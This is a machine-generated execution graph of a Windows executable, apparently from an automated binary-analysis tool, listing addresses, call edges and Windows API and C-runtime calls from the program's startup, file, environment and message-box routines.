                                                                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                                                                        execution_graph 15755 7ff72934bf5c 15776 7ff72934c12c 15755->15776 15758 7ff72934c0a8 15899 7ff72934c44c IsProcessorFeaturePresent 15758->15899 15759 7ff72934bf78 __scrt_acquire_startup_lock 15761 7ff72934c0b2 15759->15761 15768 7ff72934bf96 __scrt_release_startup_lock 15759->15768 15762 7ff72934c44c 7 API calls 15761->15762 15764 7ff72934c0bd __FrameHandler3::FrameUnwindToEmptyState 15762->15764 15763 7ff72934bfbb 15765 7ff72934c041 15782 7ff72934c594 15765->15782 15767 7ff72934c046 15785 7ff729341000 15767->15785 15768->15763 15768->15765 15888 7ff729358e44 15768->15888 15773 7ff72934c069 15773->15764 15895 7ff72934c2b0 15773->15895 15777 7ff72934c134 15776->15777 15778 7ff72934c140 __scrt_dllmain_crt_thread_attach 15777->15778 15779 7ff72934bf70 15778->15779 15780 7ff72934c14d 15778->15780 15779->15758 15779->15759 15780->15779 15906 7ff72934cba8 15780->15906 15933 7ff7293697e0 15782->15933 15784 7ff72934c5ab GetStartupInfoW 15784->15767 15786 7ff729341009 15785->15786 15935 7ff729354794 15786->15935 15788 7ff72934352b 15942 7ff7293433e0 15788->15942 15791 7ff729343538 16133 7ff72934b870 15791->16133 15796 7ff72934356c 15799 7ff729341bf0 49 API calls 15796->15799 15797 7ff729343736 16142 7ff729343f70 15797->16142 15806 7ff729343588 15799->15806 15801 7ff729343785 15803 7ff7293425f0 53 API calls 15801->15803 15803->15791 15805 7ff729343778 15807 7ff72934377d 15805->15807 15808 7ff72934379f 15805->15808 16004 7ff729347e10 15806->16004 16161 7ff72934f36c 15807->16161 15810 7ff729341bf0 49 API calls 15808->15810 15814 7ff7293437be 15810->15814 15811 7ff72934365f __vcrt_freefls 15812 7ff729347e10 14 API calls 15811->15812 15841 7ff729343834 15811->15841 15815 7ff7293436ae 15812->15815 15814->15814 15821 7ff7293418f0 115 API calls 15814->15821 16017 7ff729347f80 15815->16017 15816 7ff729343852 15818 7ff729343871 15816->15818 15819 7ff729343865 15816->15819 15820 7ff729341bf0 49 API calls 15818->15820 16168 7ff729343fe0 15819->16168 15837 7ff729343805 __vcrt_freefls 15820->15837 15824 7ff7293437df 15821->15824 15822 7ff7293436bd 15825 7ff72934380f 15822->15825 15829 7ff7293436cf 15822->15829 15824->15806 15828 7ff7293437ef 15824->15828 16026 7ff729348400 15825->16026 15833 7ff7293425f0 53 API calls 15828->15833 16022 7ff729341bf0 15829->16022 15832 7ff72934389e SetDllDirectoryW 15839 7ff7293438c3 15832->15839 15833->15791 15836 7ff7293436fc 16122 7ff7293425f0 15836->16122 16077 7ff7293486b0 15837->16077 15842 7ff729343a50 15839->15842 16082 7ff729346560 15839->16082 15841->15837 16165 7ff729343e90 15841->16165 15844 7ff729343a5a PostMessageW GetMessageW 15842->15844 15845 7ff729343a7d 15842->15845 15844->15845 16226 7ff729343080 15845->16226 15848 7ff7293438ea 15850 7ff729343947 15848->15850 15851 7ff729343901 15848->15851 16171 7ff7293465a0 15848->16171 15850->15842 15856 7ff72934395c 15850->15856 15864 7ff729343905 15851->15864 16192 7ff729346970 15851->16192 16102 7ff7293430e0 15856->16102 15860 7ff729346780 FreeLibrary 15863 7ff729343aa3 15860->15863 15864->15850 16208 7ff729342870 15864->16208 15889 7ff729358e7c 15888->15889 15890 7ff729358e5b 15888->15890 18413 7ff7293596e8 15889->18413 15890->15765 15893 7ff72934c5d8 GetModuleHandleW 15894 7ff72934c5e9 15893->15894 15894->15773 15896 7ff72934c2c1 15895->15896 15897 7ff72934c080 15896->15897 15898 7ff72934cba8 7 API calls 15896->15898 15897->15763 15898->15897 15900 7ff72934c472 _isindst __scrt_get_show_window_mode 15899->15900 15901 7ff72934c491 RtlCaptureContext RtlLookupFunctionEntry 15900->15901 15902 7ff72934c4ba RtlVirtualUnwind 15901->15902 15903 7ff72934c4f6 __scrt_get_show_window_mode 15901->15903 15902->15903 15904 7ff72934c528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15903->15904 15905 7ff72934c576 _isindst 15904->15905 15905->15761 15907 7ff72934cbba 15906->15907 15908 7ff72934cbb0 15906->15908 15907->15779 15912 7ff72934cf44 15908->15912 15913 7ff72934cf53 15912->15913 15914 7ff72934cbb5 15912->15914 15920 7ff72934d180 15913->15920 15916 7ff72934cfb0 15914->15916 15917 7ff72934cfdb 15916->15917 15918 7ff72934cfbe DeleteCriticalSection 15917->15918 15919 7ff72934cfdf 15917->15919 15918->15917 15919->15907 15924 7ff72934cfe8 15920->15924 15925 7ff72934d02c __vcrt_InitializeCriticalSectionEx 15924->15925 15931 7ff72934d0d2 TlsFree 15924->15931 15926 7ff72934d05a LoadLibraryExW 15925->15926 15929 7ff72934d119 GetProcAddress 15925->15929 15925->15931 15932 7ff72934d09d LoadLibraryExW 15925->15932 15927 7ff72934d07b GetLastError 15926->15927 15928 7ff72934d0f9 15926->15928 15927->15925 15928->15929 15930 7ff72934d110 FreeLibrary 15928->15930 15929->15931 15930->15929 15932->15925 15932->15928 15934 7ff7293697d0 15933->15934 15934->15784 15934->15934 15937 7ff72935e790 15935->15937 15938 7ff72935e836 15937->15938 15940 7ff72935e7e3 15937->15940 16249 7ff72935e668 15938->16249 16239 7ff729359b24 15940->16239 15941 7ff72935e80c 15941->15788 16356 7ff72934bb70 15942->16356 15945 7ff729343438 16358 7ff7293485a0 FindFirstFileExW 15945->16358 15946 7ff72934341b 16363 7ff7293429e0 15946->16363 15949 7ff72934342e 15954 7ff72934b870 _log10_special 8 API calls 15949->15954 15951 7ff72934344b 16373 7ff729348620 CreateFileW 15951->16373 15952 7ff7293434a5 16382 7ff729348760 15952->16382 15957 7ff7293434dd 15954->15957 15956 7ff7293434b3 15956->15949 15961 7ff7293426c0 49 API calls 15956->15961 15957->15791 15964 7ff7293418f0 15957->15964 15959 7ff72934345c 16376 7ff7293426c0 15959->16376 15960 7ff729343474 __vcrt_InitializeCriticalSectionEx 15960->15952 15961->15949 15965 7ff729343f70 108 API calls 15964->15965 15966 7ff729341925 15965->15966 15967 7ff729341bb6 15966->15967 15969 7ff7293476a0 83 API calls 15966->15969 15968 7ff72934b870 _log10_special 8 API calls 15967->15968 15970 7ff729341bd1 15968->15970 15971 7ff72934196b 15969->15971 15970->15796 15970->15797 16003 7ff72934199c 15971->16003 16787 7ff72934f9f4 15971->16787 15973 7ff72934f36c 74 API calls 15973->15967 15974 7ff729341985 15975 7ff729341989 15974->15975 15976 7ff7293419a1 15974->15976 16794 7ff729342760 15975->16794 16791 7ff72934f6bc 15976->16791 15980 7ff7293419d7 15983 7ff7293419ee 15980->15983 15984 7ff729341a06 15980->15984 15981 7ff7293419bf 15982 7ff729342760 53 API calls 15981->15982 15982->16003 15985 7ff729342760 53 API calls 15983->15985 15986 7ff729341bf0 49 API calls 15984->15986 15985->16003 15987 7ff729341a1d 15986->15987 15988 7ff729341bf0 49 API calls 15987->15988 15989 7ff729341a68 15988->15989 15990 7ff72934f9f4 73 API calls 15989->15990 15991 7ff729341a8c 15990->15991 15992 7ff729341ab9 15991->15992 15993 7ff729341aa1 15991->15993 15995 7ff72934f6bc _fread_nolock 53 API calls 15992->15995 15994 7ff729342760 53 API calls 15993->15994 15994->16003 15996 7ff729341ace 15995->15996 15997 7ff729341aec 15996->15997 15998 7ff729341ad4 15996->15998 16811 7ff72934f430 15997->16811 15999 7ff729342760 53 API calls 15998->15999 15999->16003 16002 7ff7293425f0 53 API calls 16002->16003 16003->15973 16005 7ff729347e1a 16004->16005 16006 7ff7293486b0 2 API calls 16005->16006 16007 7ff729347e39 GetEnvironmentVariableW 16006->16007 16008 7ff729347ea2 16007->16008 16009 7ff729347e56 ExpandEnvironmentStringsW 16007->16009 16011 7ff72934b870 _log10_special 8 API calls 16008->16011 16009->16008 16010 7ff729347e78 16009->16010 16012 7ff729348760 2 API calls 16010->16012 16013 7ff729347eb4 16011->16013 16014 7ff729347e8a 16012->16014 16013->15811 16015 7ff72934b870 _log10_special 8 API calls 16014->16015 16016 7ff729347e9a 16015->16016 16016->15811 16018 7ff7293486b0 2 API calls 16017->16018 16019 7ff729347f94 16018->16019 17020 7ff729357548 16019->17020 16021 7ff729347fa6 __vcrt_freefls 16021->15822 16023 7ff729341c15 16022->16023 16024 7ff729353ca4 49 API calls 16023->16024 16025 7ff729341c38 16024->16025 16025->15836 16025->15837 16027 7ff729348415 16026->16027 17038 7ff729347b50 GetCurrentProcess OpenProcessToken 16027->17038 16030 7ff729347b50 7 API calls 16031 7ff729348441 16030->16031 16032 7ff72934845a 16031->16032 16033 7ff729348474 16031->16033 16035 7ff729342590 48 API calls 16032->16035 16034 7ff729342590 48 API calls 16033->16034 16036 7ff729348487 LocalFree LocalFree 16034->16036 16037 7ff729348472 16035->16037 16038 7ff7293484a3 16036->16038 16041 7ff7293484af 16036->16041 16037->16036 17048 7ff729342940 16038->17048 16040 7ff72934b870 _log10_special 8 API calls 16041->16040 16078 7ff7293486f6 16077->16078 16079 7ff7293486d2 MultiByteToWideChar 16077->16079 16080 7ff729348713 MultiByteToWideChar 16078->16080 16081 7ff72934870c __vcrt_freefls 16078->16081 16079->16078 16079->16081 16080->16081 16081->15832 16083 7ff729346575 16082->16083 16084 7ff7293438d5 16083->16084 16085 7ff729342760 53 API calls 16083->16085 16086 7ff729346b00 16084->16086 16085->16084 16087 7ff729346b30 16086->16087 16100 7ff729346b4a __vcrt_freefls 16086->16100 16087->16100 17332 7ff729341440 16087->17332 16089 7ff729346b54 16090 7ff729343fe0 49 API calls 16089->16090 16089->16100 16091 7ff729346b76 16090->16091 16092 7ff729346b7b 16091->16092 16093 7ff729343fe0 49 API calls 16091->16093 16094 7ff729342870 53 API calls 16092->16094 16095 7ff729346b9a 16093->16095 16094->16100 16095->16092 16096 7ff729343fe0 49 API calls 16095->16096 16097 7ff729346bb6 16096->16097 16097->16092 16098 7ff729346bbf 16097->16098 16100->15848 16114 7ff7293430ee __scrt_get_show_window_mode 16102->16114 16103 7ff72934b870 _log10_special 8 API calls 16105 7ff72934338e 16103->16105 16104 7ff7293432e7 16104->16103 16105->15791 16121 7ff7293483e0 LocalFree 16105->16121 16107 7ff729341bf0 49 API calls 16107->16114 16108 7ff729343309 16110 7ff7293425f0 53 API calls 16108->16110 16110->16104 16113 7ff7293432e9 16116 7ff7293425f0 53 API calls 16113->16116 16114->16104 16114->16107 16114->16108 16114->16113 16115 7ff729342870 53 API calls 16114->16115 16119 7ff7293432f7 16114->16119 17393 7ff729343f10 16114->17393 17399 7ff729347530 16114->17399 17411 7ff7293415c0 16114->17411 17449 7ff7293468e0 16114->17449 17453 7ff729343b40 16114->17453 17497 7ff729343e00 16114->17497 16115->16114 16116->16104 16120 7ff7293425f0 53 API calls 16119->16120 16120->16104 16123 7ff72934262a 16122->16123 16124 7ff729353ca4 49 API calls 16123->16124 16125 7ff729342652 16124->16125 16126 7ff7293486b0 2 API calls 16125->16126 16127 7ff72934266a 16126->16127 16128 7ff729342677 MessageBoxW 16127->16128 16129 7ff72934268e MessageBoxA 16127->16129 16130 7ff7293426a0 16128->16130 16129->16130 16135 7ff72934b879 16133->16135 16134 7ff72934372a 16134->15893 16135->16134 16136 7ff72934bc00 IsProcessorFeaturePresent 16135->16136 16137 7ff72934bc18 16136->16137 17633 7ff72934bdf8 RtlCaptureContext 16137->17633 16143 7ff729343f7c 16142->16143 16144 7ff7293486b0 2 API calls 16143->16144 16145 7ff729343fa4 16144->16145 16146 7ff7293486b0 2 API calls 16145->16146 16147 7ff729343fb7 16146->16147 17638 7ff7293552a4 16147->17638 16150 7ff72934b870 _log10_special 8 API calls 16151 7ff729343746 16150->16151 16151->15801 16152 7ff7293476a0 16151->16152 16153 7ff7293476c4 16152->16153 16154 7ff72934f9f4 73 API calls 16153->16154 16159 7ff72934779b __vcrt_freefls 16153->16159 16155 7ff7293476e0 16154->16155 16155->16159 18029 7ff729356bd8 16155->18029 16157 7ff72934f9f4 73 API calls 16160 7ff7293476f5 16157->16160 16158 7ff72934f6bc _fread_nolock 53 API calls 16158->16160 16159->15805 16160->16157 16160->16158 16160->16159 16162 7ff72934f39c 16161->16162 18044 7ff72934f148 16162->18044 16164 7ff72934f3b5 16164->15801 16166 7ff729341bf0 49 API calls 16165->16166 16167 7ff729343ead 16166->16167 16167->15816 16169 7ff729341bf0 49 API calls 16168->16169 16170 7ff729344010 16169->16170 16170->15837 16189 7ff7293465bc 16171->16189 16172 7ff7293466df 16173 7ff72934b870 _log10_special 8 API calls 16172->16173 16174 7ff7293466f1 16173->16174 16174->15851 16175 7ff7293417e0 45 API calls 16175->16189 16176 7ff72934675d 16178 7ff7293425f0 53 API calls 16176->16178 16177 7ff729341bf0 49 API calls 16177->16189 16178->16172 16179 7ff72934674a 16181 7ff7293425f0 53 API calls 16179->16181 16180 7ff729343f10 10 API calls 16180->16189 16181->16172 16182 7ff72934670d 16184 7ff7293425f0 53 API calls 16182->16184 16183 7ff729347530 52 API calls 16183->16189 16184->16172 16185 7ff729342870 53 API calls 16185->16189 16186 7ff729346737 16187 7ff7293425f0 53 API calls 16186->16187 16187->16172 16188 7ff7293415c0 118 API calls 16188->16189 16189->16172 16189->16175 16189->16176 16189->16177 16189->16179 16189->16180 16189->16182 16189->16183 16189->16185 16189->16186 16189->16188 16190 7ff729346720 16189->16190 16191 7ff7293425f0 53 API calls 16190->16191 16191->16172 18055 7ff7293481a0 16192->18055 16194 7ff729346989 16195 7ff7293481a0 3 API calls 16194->16195 16196 7ff72934699c 16195->16196 16197 7ff7293469cf 16196->16197 16199 7ff7293469b4 16196->16199 16198 7ff7293425f0 53 API calls 16197->16198 16200 7ff729343916 16198->16200 18059 7ff729346ea0 GetProcAddress 16199->18059 16200->15864 16202 7ff729346cd0 16200->16202 16203 7ff729346ced 16202->16203 16209 7ff7293428aa 16208->16209 16210 7ff729353ca4 49 API calls 16209->16210 16211 7ff7293428d2 16210->16211 16212 7ff7293486b0 2 API calls 16211->16212 16213 7ff7293428ea 16212->16213 16214 7ff7293428f7 MessageBoxW 16213->16214 16215 7ff72934290e MessageBoxA 16213->16215 16216 7ff729342920 16214->16216 16215->16216 16217 7ff72934b870 _log10_special 8 API calls 16216->16217 16218 7ff729342930 16217->16218 16219 7ff729346780 16218->16219 18124 7ff729345af0 16226->18124 16234 7ff7293430b9 16235 7ff7293433a0 16234->16235 16236 7ff7293433ae 16235->16236 16237 7ff7293433bf 16236->16237 18412 7ff729348180 FreeLibrary 16236->18412 16237->15860 16256 7ff72935986c 16239->16256 16243 7ff729359b5f 16243->15941 16355 7ff72935477c EnterCriticalSection 16249->16355 16257 7ff729359888 GetLastError 16256->16257 16258 7ff7293598c3 16256->16258 16259 7ff729359898 16257->16259 16258->16243 16262 7ff7293598d8 16258->16262 16269 7ff72935a6a0 16259->16269 16263 7ff72935990c 16262->16263 16264 7ff7293598f4 GetLastError SetLastError 16262->16264 16263->16243 16265 7ff729359c10 IsProcessorFeaturePresent 16263->16265 16264->16263 16266 7ff729359c23 16265->16266 16347 7ff729359924 16266->16347 16270 7ff72935a6da FlsSetValue 16269->16270 16271 7ff72935a6bf FlsGetValue 16269->16271 16272 7ff7293598b3 SetLastError 16270->16272 16274 7ff72935a6e7 16270->16274 16271->16272 16273 7ff72935a6d4 16271->16273 16272->16258 16273->16270 16286 7ff72935dea8 16274->16286 16277 7ff72935a714 FlsSetValue 16280 7ff72935a720 FlsSetValue 16277->16280 16281 7ff72935a732 16277->16281 16278 7ff72935a704 FlsSetValue 16279 7ff72935a70d 16278->16279 16293 7ff729359c58 16279->16293 16280->16279 16299 7ff72935a204 16281->16299 16291 7ff72935deb9 _get_daylight 16286->16291 16287 7ff72935deee HeapAlloc 16289 7ff72935a6f6 16287->16289 16287->16291 16288 7ff72935df0a 16307 7ff7293543f4 16288->16307 16289->16277 16289->16278 16291->16287 16291->16288 16304 7ff7293628a0 16291->16304 16294 7ff729359c5d RtlFreeHeap 16293->16294 16295 7ff729359c8c 16293->16295 16294->16295 16296 7ff729359c78 GetLastError 16294->16296 16295->16272 16297 7ff729359c85 Concurrency::details::SchedulerProxy::DeleteThis 16296->16297 16298 7ff7293543f4 _get_daylight 9 API calls 16297->16298 16298->16295 16333 7ff72935a0dc 16299->16333 16310 7ff7293628e0 16304->16310 16316 7ff72935a5d8 GetLastError 16307->16316 16309 7ff7293543fd 16309->16289 16315 7ff72935f5e8 EnterCriticalSection 16310->16315 16317 7ff72935a5fc 16316->16317 16318 7ff72935a619 FlsSetValue 16316->16318 16317->16318 16330 7ff72935a609 16317->16330 16319 7ff72935a62b 16318->16319 16318->16330 16321 7ff72935dea8 _get_daylight 5 API calls 16319->16321 16320 7ff72935a685 SetLastError 16320->16309 16322 7ff72935a63a 16321->16322 16323 7ff72935a658 FlsSetValue 16322->16323 16324 7ff72935a648 FlsSetValue 16322->16324 16326 7ff72935a664 FlsSetValue 16323->16326 16327 7ff72935a676 16323->16327 16325 7ff72935a651 16324->16325 16328 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16325->16328 16326->16325 16329 7ff72935a204 _get_daylight 5 API calls 16327->16329 16328->16330 16331 7ff72935a67e 16329->16331 16330->16320 16332 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16331->16332 16332->16320 16345 7ff72935f5e8 EnterCriticalSection 16333->16345 16348 7ff72935995e _isindst __scrt_get_show_window_mode 16347->16348 16349 7ff729359986 RtlCaptureContext RtlLookupFunctionEntry 16348->16349 16350 7ff7293599f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16349->16350 16351 7ff7293599c0 RtlVirtualUnwind 16349->16351 16354 7ff729359a48 _isindst 16350->16354 16351->16350 16352 7ff72934b870 _log10_special 8 API calls 16353 7ff729359a67 GetCurrentProcess TerminateProcess 16352->16353 16354->16352 16357 7ff7293433ec GetModuleFileNameW 16356->16357 16357->15945 16357->15946 16359 7ff7293485df FindClose 16358->16359 16360 7ff7293485f2 16358->16360 16359->16360 16361 7ff72934b870 _log10_special 8 API calls 16360->16361 16362 7ff729343442 16361->16362 16362->15951 16362->15952 16364 7ff72934bb70 16363->16364 16365 7ff7293429fc GetLastError 16364->16365 16366 7ff729342a29 16365->16366 16387 7ff729353ef8 16366->16387 16371 7ff72934b870 _log10_special 8 API calls 16372 7ff729342ae5 16371->16372 16372->15949 16374 7ff729343458 16373->16374 16375 7ff729348660 GetFinalPathNameByHandleW CloseHandle 16373->16375 16374->15959 16374->15960 16375->16374 16377 7ff7293426fa 16376->16377 16378 7ff729353ef8 48 API calls 16377->16378 16379 7ff729342722 MessageBoxW 16378->16379 16380 7ff72934b870 _log10_special 8 API calls 16379->16380 16381 7ff72934274c 16380->16381 16381->15949 16383 7ff72934878a WideCharToMultiByte 16382->16383 16385 7ff7293487b5 16382->16385 16384 7ff7293487cb __vcrt_freefls 16383->16384 16383->16385 16384->15956 16385->16384 16386 7ff7293487d2 WideCharToMultiByte 16385->16386 16386->16384 16389 7ff729353f52 16387->16389 16388 7ff729353f77 16391 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16388->16391 16389->16388 16390 7ff729353fb3 16389->16390 16409 7ff7293522b0 16390->16409 16393 7ff729353fa1 16391->16393 16395 7ff72934b870 _log10_special 8 API calls 16393->16395 16394 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16394->16393 16397 7ff729342a54 FormatMessageW 16395->16397 16405 7ff729342590 16397->16405 16398 7ff729354060 16399 7ff729354094 16398->16399 16400 7ff729354069 16398->16400 16399->16394 16403 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16400->16403 16401 7ff7293540ba 16401->16399 16402 7ff7293540c4 16401->16402 16404 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16402->16404 16403->16393 16404->16393 16406 7ff7293425b5 16405->16406 16407 7ff729353ef8 48 API calls 16406->16407 16408 7ff7293425d8 MessageBoxW 16407->16408 16408->16371 16410 7ff7293522ee 16409->16410 16415 7ff7293522de 16409->16415 16411 7ff7293522f7 16410->16411 16416 7ff729352325 16410->16416 16413 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16411->16413 16412 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16414 7ff72935231d 16412->16414 16413->16414 16414->16398 16414->16399 16414->16400 16414->16401 16415->16412 16416->16414 16416->16415 16420 7ff729352cc4 16416->16420 16453 7ff729352710 16416->16453 16490 7ff729351ea0 16416->16490 16421 7ff729352d77 16420->16421 16422 7ff729352d06 16420->16422 16425 7ff729352d7c 16421->16425 16426 7ff729352dd0 16421->16426 16423 7ff729352d0c 16422->16423 16424 7ff729352da1 16422->16424 16427 7ff729352d40 16423->16427 16428 7ff729352d11 16423->16428 16513 7ff729351074 16424->16513 16429 7ff729352d7e 16425->16429 16430 7ff729352db1 16425->16430 16431 7ff729352ddf 16426->16431 16433 7ff729352de7 16426->16433 16434 7ff729352dda 16426->16434 16427->16431 16435 7ff729352d17 16427->16435 16428->16433 16428->16435 16440 7ff729352d8d 16429->16440 16442 7ff729352d20 16429->16442 16520 7ff729350c64 16430->16520 16451 7ff729352e10 16431->16451 16531 7ff729351484 16431->16531 16527 7ff7293539cc 16433->16527 16434->16424 16434->16431 16441 7ff729352d52 16435->16441 16435->16442 16449 7ff729352d3b 16435->16449 16440->16424 16443 7ff729352d92 16440->16443 16441->16451 16503 7ff7293537b4 16441->16503 16442->16451 16493 7ff729353478 16442->16493 16443->16451 16509 7ff729353878 16443->16509 16445 7ff72934b870 _log10_special 8 API calls 16446 7ff72935310a 16445->16446 16446->16416 16449->16451 16452 7ff729352ffc 16449->16452 16538 7ff729353ae0 16449->16538 16451->16445 16452->16451 16544 7ff72935dd18 16452->16544 16454 7ff72935271e 16453->16454 16455 7ff729352734 16453->16455 16457 7ff729352d77 16454->16457 16458 7ff729352d06 16454->16458 16463 7ff729352774 16454->16463 16456 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16455->16456 16455->16463 16456->16463 16461 7ff729352d7c 16457->16461 16462 7ff729352dd0 16457->16462 16459 7ff729352d0c 16458->16459 16460 7ff729352da1 16458->16460 16464 7ff729352d40 16459->16464 16465 7ff729352d11 16459->16465 16469 7ff729351074 38 API calls 16460->16469 16466 7ff729352d7e 16461->16466 16467 7ff729352db1 16461->16467 16468 7ff729352ddf 16462->16468 16470 7ff729352de7 16462->16470 16471 7ff729352dda 16462->16471 16463->16416 16464->16468 16472 7ff729352d17 16464->16472 16465->16470 16465->16472 16477 7ff729352d8d 16466->16477 16479 7ff729352d20 16466->16479 16473 7ff729350c64 38 API calls 16467->16473 16476 7ff729351484 38 API calls 16468->16476 16488 7ff729352e10 16468->16488 16485 7ff729352d3b 16469->16485 16475 7ff7293539cc 45 API calls 16470->16475 16471->16460 16471->16468 16478 7ff729352d52 16472->16478 16472->16479 16472->16485 16473->16485 16474 7ff729353478 47 API calls 16474->16485 16475->16485 16476->16485 16477->16460 16480 7ff729352d92 16477->16480 16481 7ff7293537b4 46 API calls 16478->16481 16478->16488 16479->16474 16479->16488 16483 7ff729353878 37 API calls 16480->16483 16480->16488 16481->16485 16482 7ff72934b870 _log10_special 8 API calls 16484 7ff72935310a 16482->16484 16483->16485 16484->16416 16486 7ff729353ae0 45 API calls 16485->16486 16485->16488 16489 7ff729352ffc 16485->16489 16486->16489 16487 7ff72935dd18 46 API calls 16487->16489 16488->16482 16489->16487 16489->16488 16770 7ff7293502e8 16490->16770 16494 7ff72935349e 16493->16494 16556 7ff72934fea0 16494->16556 16499 7ff729353ae0 45 API calls 16501 7ff7293535e3 16499->16501 16500 7ff729353ae0 45 API calls 16502 7ff729353671 16500->16502 16501->16500 16501->16501 16501->16502 16502->16449 16505 7ff7293537e9 16503->16505 16504 7ff729353807 16507 7ff72935dd18 46 API calls 16504->16507 16505->16504 16506 7ff729353ae0 45 API calls 16505->16506 16508 7ff72935382e 16505->16508 16506->16504 16507->16508 16508->16449 16510 7ff729353899 16509->16510 16511 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16510->16511 16512 7ff7293538ca 16510->16512 16511->16512 16512->16449 16514 7ff7293510a7 16513->16514 16515 7ff7293510d6 16514->16515 16518 7ff729351193 16514->16518 16516 7ff729351113 16515->16516 16702 7ff72934ff48 16515->16702 16516->16449 16519 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16518->16519 16519->16516 16521 7ff729350c97 16520->16521 16522 7ff729350cc6 16521->16522 16524 7ff729350d83 16521->16524 16523 7ff72934ff48 12 API calls 16522->16523 16525 7ff729350d03 16522->16525 16523->16525 16526 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16524->16526 16525->16449 16526->16525 16528 7ff729353a0f 16527->16528 16530 7ff729353a13 __crtLCMapStringW 16528->16530 16710 7ff729353a68 16528->16710 16530->16449 16532 7ff7293514b7 16531->16532 16533 7ff7293514e6 16532->16533 16535 7ff7293515a3 16532->16535 16534 7ff72934ff48 12 API calls 16533->16534 16537 7ff729351523 16533->16537 16534->16537 16536 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16535->16536 16536->16537 16537->16449 16539 7ff729353af7 16538->16539 16714 7ff72935ccc8 16539->16714 16546 7ff72935dd49 16544->16546 16554 7ff72935dd57 16544->16554 16545 7ff72935dd77 16547 7ff72935dd88 16545->16547 16548 7ff72935ddaf 16545->16548 16546->16545 16549 7ff729353ae0 45 API calls 16546->16549 16546->16554 16760 7ff72935f3b0 16547->16760 16551 7ff72935de3a 16548->16551 16552 7ff72935ddd9 16548->16552 16548->16554 16549->16545 16553 7ff72935ebb0 _fread_nolock MultiByteToWideChar 16551->16553 16552->16554 16763 7ff72935ebb0 16552->16763 16553->16554 16554->16452 16557 7ff72934fed7 16556->16557 16558 7ff72934fec6 16556->16558 16557->16558 16586 7ff72935c90c 16557->16586 16564 7ff72935d880 16558->16564 16561 7ff72934ff18 16563 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16561->16563 16562 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16562->16561 16563->16558 16565 7ff72935d89d 16564->16565 16566 7ff72935d8d0 16564->16566 16567 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16565->16567 16566->16565 16569 7ff72935d902 16566->16569 16576 7ff7293535c1 16567->16576 16568 7ff72935da15 16570 7ff72935db07 16568->16570 16572 7ff72935dacd 16568->16572 16574 7ff72935da9c 16568->16574 16575 7ff72935da5f 16568->16575 16578 7ff72935da55 16568->16578 16569->16568 16581 7ff72935d94a 16569->16581 16626 7ff72935cd6c 16570->16626 16619 7ff72935d104 16572->16619 16612 7ff72935d3e4 16574->16612 16602 7ff72935d614 16575->16602 16576->16499 16576->16501 16578->16572 16580 7ff72935da5a 16578->16580 16580->16574 16580->16575 16581->16576 16593 7ff7293597b4 16581->16593 16584 7ff729359c10 _isindst 17 API calls 16585 7ff72935db64 16584->16585 16587 7ff72935c957 16586->16587 16592 7ff72935c91b _get_daylight 16586->16592 16588 7ff7293543f4 _get_daylight 11 API calls 16587->16588 16590 7ff72934ff04 16588->16590 16589 7ff72935c93e HeapAlloc 16589->16590 16589->16592 16590->16561 16590->16562 16591 7ff7293628a0 _get_daylight 2 API calls 16591->16592 16592->16587 16592->16589 16592->16591 16594 7ff7293597cb 16593->16594 16595 7ff7293597c1 16593->16595 16596 7ff7293543f4 _get_daylight 11 API calls 16594->16596 16595->16594 16599 7ff7293597e6 16595->16599 16601 7ff7293597d2 16596->16601 16598 7ff7293597de 16598->16576 16598->16584 16599->16598 16600 7ff7293543f4 _get_daylight 11 API calls 16599->16600 16600->16601 16635 7ff729359bf0 16601->16635 16638 7ff7293633bc 16602->16638 16606 7ff72935d6bc 16607 7ff72935d711 16606->16607 16608 7ff72935d6dc 16606->16608 16611 7ff72935d6c0 16606->16611 16691 7ff72935d200 16607->16691 16687 7ff72935d4bc 16608->16687 16611->16576 16613 7ff7293633bc 38 API calls 16612->16613 16614 7ff72935d42e 16613->16614 16615 7ff729362e04 37 API calls 16614->16615 16616 7ff72935d47e 16615->16616 16617 7ff72935d482 16616->16617 16618 7ff72935d4bc 45 API calls 16616->16618 16617->16576 16618->16617 16620 7ff7293633bc 38 API calls 16619->16620 16621 7ff72935d14f 16620->16621 16622 7ff729362e04 37 API calls 16621->16622 16623 7ff72935d1a7 16622->16623 16624 7ff72935d1ab 16623->16624 16625 7ff72935d200 45 API calls 16623->16625 16624->16576 16625->16624 16627 7ff72935cde4 16626->16627 16628 7ff72935cdb1 16626->16628 16630 7ff72935cdfc 16627->16630 16633 7ff72935ce7d 16627->16633 16629 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16628->16629 16632 7ff72935cddd __scrt_get_show_window_mode 16629->16632 16631 7ff72935d104 46 API calls 16630->16631 16631->16632 16632->16576 16633->16632 16634 7ff729353ae0 45 API calls 16633->16634 16634->16632 16636 7ff729359a88 _invalid_parameter_noinfo 37 API calls 16635->16636 16637 7ff729359c09 16636->16637 16637->16598 16639 7ff72936340f fegetenv 16638->16639 16640 7ff72936713c 37 API calls 16639->16640 16644 7ff729363462 16640->16644 16641 7ff72936348f 16646 7ff7293597b4 __std_exception_copy 37 API calls 16641->16646 16642 7ff729363552 16643 7ff72936713c 37 API calls 16642->16643 16645 7ff72936357c 16643->16645 16644->16642 16647 7ff72936352c 16644->16647 16648 7ff72936347d 16644->16648 16649 7ff72936713c 37 API calls 16645->16649 16650 7ff72936350d 16646->16650 16653 7ff7293597b4 __std_exception_copy 37 API calls 16647->16653 16648->16641 16648->16642 16651 7ff72936358d 16649->16651 16652 7ff729364634 16650->16652 16657 